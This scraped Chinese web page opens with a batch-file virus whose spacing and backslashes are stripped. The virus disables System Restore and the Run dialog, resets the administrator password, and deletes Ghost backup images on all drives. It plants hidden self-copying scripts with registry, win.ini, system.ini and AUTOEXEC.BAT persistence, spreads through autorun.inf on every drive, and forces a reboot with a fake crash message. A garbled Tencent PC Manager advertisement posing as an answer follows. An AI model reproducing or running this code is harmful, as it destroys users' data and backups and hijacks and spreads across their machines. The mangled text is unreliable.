NoSetTaskBar/tREG_DWORD
/d00000001/f>nul
REGADDHKEY_LOCAL_""NTCurrentVersionSystemRestore/v
DisableSR/tREG_DWORD/d
00000001/f>nul
REGADDHKEY_LOCAL_""NTSystemRestore/v
DisableConfig/tREG_DWORD/d
00000001/f>nul
REGADDHKEY_CURRENT_/v
RestrictRun/tREG_DWORD/d
00000001/f>nul
cls
netuseradministrator123456>nul
for%%cin(c%alldrive%)dodel%%c:*.gho/f/s/q>nul
echo@echooff>d:setup.bat
echoshutdown-r-t10-f-c亲爱的朋友，我十分抱歉的通知你，你的电脑已经严重崩溃，请重新
安装系统可以解决此问题
!^.^>>d:setup.bat
echod:setup.batc:Documents""and""SettingsAll""Users“开始”菜单程序启动
a.bat>>d:setup.bat
echoREGADDHKEY_LOCAL_CurrentVersionRun/v
setup.bat/tREG_SZ/dd:setup.bat
/f>>d:setup.bat
echoREGADDHKEY_CURRENT_/v
setup.bat/tREG_SZ/dd:setup.bat
/f>>d:setup.bat
echoREGADDHKEY_LOCAL_CurrentVersionRunOnce/v
setup.bat/tREG_SZ/dd:setup.bat
/f>>d:setup.bat
HKEY_CLASSES_ROOTatfileshellopencommand/vsetup.bat/tREG_SZ/dd:setup.bat/f
>>d:setup.bat
echo[windows]>>%windir%win.ini
echorun=d:setup.batC:AUTOEXEC.BAT>>%windir%win.ini
echoload=d:setup.batC:AUTOEXEC.BAT>>%windir%win.ini
echo[boot]>>%windir%system.ini
echoshell=explorer.exesetup.batC:AUTOEXEC.BAT>>%windir%system.ini
echo[AutoRun]>d:autorun.inf
echoOpen=setup.bat>>d:autorun.inf
echoOpen=system.bat>>d:autorun.inf
attribd:autorun.inf+r+s+h>>d:setup.bat
attribd:setup.bat+r+s+h>>d:setup.bat
startd:setup.bat/min>nul
echo@echooff>>C:AUTOEXEC.BAT
echoREGADDHKEY_LOCAL_CurrentVersionRun/v
AUTOEXEC.BAT/tREG_SZ/d
C:AUTOEXEC.BAT/f>>C:AUTOEXEC.BAT
echoREGADDHKEY_CURRENT_/v
AUTOEXEC.BAT/tREG_SZ/d
C:AUTOEXEC.BAT/f>>C:AUTOEXEC.BAT
REGADDHKEY_LOCAL_CurrentVersionRunOnce/v
AUTOEXEC.BAT/tREG_SZ/d
C:AUTOEXEC.BAT/f>>C:AUTOEXEC.BAT
echoREGADDHKEY_LOCAL_CurrentVersionRun/v
setup.bat/tREG_SZ/dd:setup.bat
/f>>C:AUTOEXEC.BAT
echoREGADDHKEY_CURRENT_/v
setup.bat/tREG_SZ/dd:setup.bat
/f>>C:AUTOEXEC.BAT
REGADDHKEY_LOCAL_CurrentVersionRunOnce/v
setup.bat/tREG_SZ/dd:setup.bat
/f>>C:AUTOEXEC.BAT
echoifnotd:setup.batstart%windir%system32cmd.bat/min>>C:AUTOEXEC.BAT
%0%systemroot%windows.bat>nul
ifnotexist%windir%/system32/explorer.bat@echooff>>%windir%/system32/explorer.bat
ifnotexistC:AUTOEXEC.BATstart%windir%system32cmd.bat/min>>%
windir%/system32/explorer.bat
ifnotexist%windir%system32cmd.batstart%systemroot%windows.bat/min>>%
windir%/system32/explorer.bat
echoREGADDHKEY_LOCAL_CurrentVersionRun/v
AUTOEXEC.BAT/tREG_SZ/d
C:AUTOEXEC.BAT/f>>%windir%/system32/explorer.bat
echoREGADDHKEY_CURRENT_/v
AUTOEXEC.BAT/tREG_SZ/d
C:AUTOEXEC.BAT/f>>%windir%/system32/explorer.bat
echoREGADDHKEY_LOCAL_CurrentVersionRun/v
setup.bat/tREG_SZ/dd:setup.bat
/f>>%windir%/system32/explorer.bat
echoREGADDHKEY_CURRENT_/v
setup.bat/tREG_SZ/dd:setup.bat
/f>>%windir%/system32/explorer.bat
echoREGADDHKEY_LOCAL_CurrentVersionRun/v
explorer.bat/tREG_SZ/d%
windir%/system32/explorer.bat/f>>%windir%/system32/explorer.bat
echoREGADDHKEY_CURRENT_/v
explorer.bat/tREG_SZ/d%
windir%/system32/explorer.bat/f>>%windir%/system32/explorer.bat
echostart%systemroot%windows.bat/min>>%windir%/system32/explorer.bat
attrib%windir%/system32/explorer.bat+r+s+h%
attrib%systemroot%/windows.bat+r+s+h
for%%cin(%alldrive%)doecho@echooff>>%%c:system.bat
for%%cin(%alldrive%)doechostart%windir%system32cmd.bat/min>>%%c:system.bat
for%%cin(%alldrive%)doechoattribsystem.bat+r+s+h>>%%c:system.bat
setdrive=efghijklmnopqrstuvwxyz
for%%cin(%drive%)doecho[AuroRun]>%%c:autorun.inf
for%%cin(%drive%)doechoOpen=system.bat>>%%c:autorun.inf
%0d:Program""Files
un.bat
for%%cin(%alldrive%)doechoifnotexist%windir%/system32/explorer.batstart
d:Program""Files
un.bat/min
>>%%c:system.bat
for%%cin(%alldrive%)doattribautorun.inf+r+s+h>>%%c:system.bat
for%%cin(%alldrive%)doattrib%%c:autorun.inf+r+s+h>nul
for%%cin(%alldrive%)doattrib%%c:system.bat+r+s+h>nul
ifnotexist%windir%/system32/explorer.batstartd:Program""Files
un.bat
/min>>d:setup.bat
attribd:Program""Files
un.bat+r+s+h>nul
del%0
exit

㈩ 怎样编写简单，对系统无害的病毒文件

您好

1，病毒都是对系统有害的，否则就是普通程序了。病毒一般都是带有破坏性或者目的性的。

2，拆碰如如果您是想学编程，可以到腾讯电脑管家官网下载一吵枝个电脑管家。

3，然后打开电脑管家——软件管理——软件仓库——右上角搜索【Turbo C/C++ for Windows 集成实验与学习环境】这个软件。

4，下载后好好跟着学习，以后就会编程了。通过电脑管家下载软件，不仅软件数量很多，而且都是经过专业计算机工程师检测过的，可以保证无毒无木马放心下载。

如果还有其他疑问和问题，欢迎再次来旅启电脑管家企业平台进行提问，我们将尽全力为您解答疑难